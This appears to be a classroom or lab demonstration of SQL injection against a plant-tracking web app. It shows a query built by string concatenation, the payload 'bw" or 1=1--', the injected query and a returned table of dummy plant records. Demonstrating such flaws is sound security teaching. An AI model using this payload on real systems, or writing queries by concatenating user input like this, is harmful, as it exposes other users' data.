SQL search string:
var sql_query = 'SELECT id , name , color , planttype , potsize , shared FROM
plants WHERE user_id =' + user_id + ' AND name LIKE "% ' + plant + '%"; ';

Exploit string to search: bw" or 1=1--

=> SQL string after injection: var sql_query = 'SELECT id , name , color , planttype , potsize , shared FROM
plants WHERE user_id =' + user_id + ' AND name LIKE "%bw" or 1=1-- %"; ';

Table returned below

arctic bulb	green	extict	20 liter	
Asian bulb	lemon	livewort	9 in	
Australian berry	carmine	algae	tall	
autumn chili	magnolia	fern	huge	
bog tomato	wisteria	toadstool	4 liter	
city kumquat	light silver	extict	30 cm	
colorful berry	white	kewl	15 cm	
colorful orange	marigold	gynkgo	XL	
colorful tulip	green	unwanted gift	huge	
Eastern blueberry	plum	moss	4 liter	
European raspberry	bright indigo	invasive	2 liter	
farm agave	wisteria	unwanted gift	tiny	
fashionable mushroom	sugar	weed	5 liter	
handsome cactus	marigold	birthday present	15 cm	
Indian moss	magenta	toadstool	10 cm	
low orange	ruby	gynkgo	7 liter	
magic violet	sugar	unwanted gift	25 cm	
Northern orchid	vanilla	flower	XXL	
Northern raspberry	denim	expensive	2 ft	
oceanic climber	purple	mandrake	6 liter	
oceanic epiphyte	arctic pink	birthday present	XL	
old yucca	purple	weed	tiny	
peak tree	brown	moss	tiny	
plains kiwi	titanium poppy	livewort	6 liter	
plains kumquat	sugar	lovely	8 liter	
river grass	pink	expensive	XL	
river lily	brown	potty	20 cm	
spring raspberry	brass	flower	bonsai	
stinky potato	marigold	stolen	5 in	
swamp fig	white	kewl	L	
tall moss	violet	flower	35 cm	
viral mushroom	neon white	extict	small	
water orange	coffee	stolen	tall	
Western pepper	white	potty	XXL	
wide slime	plum	algae	L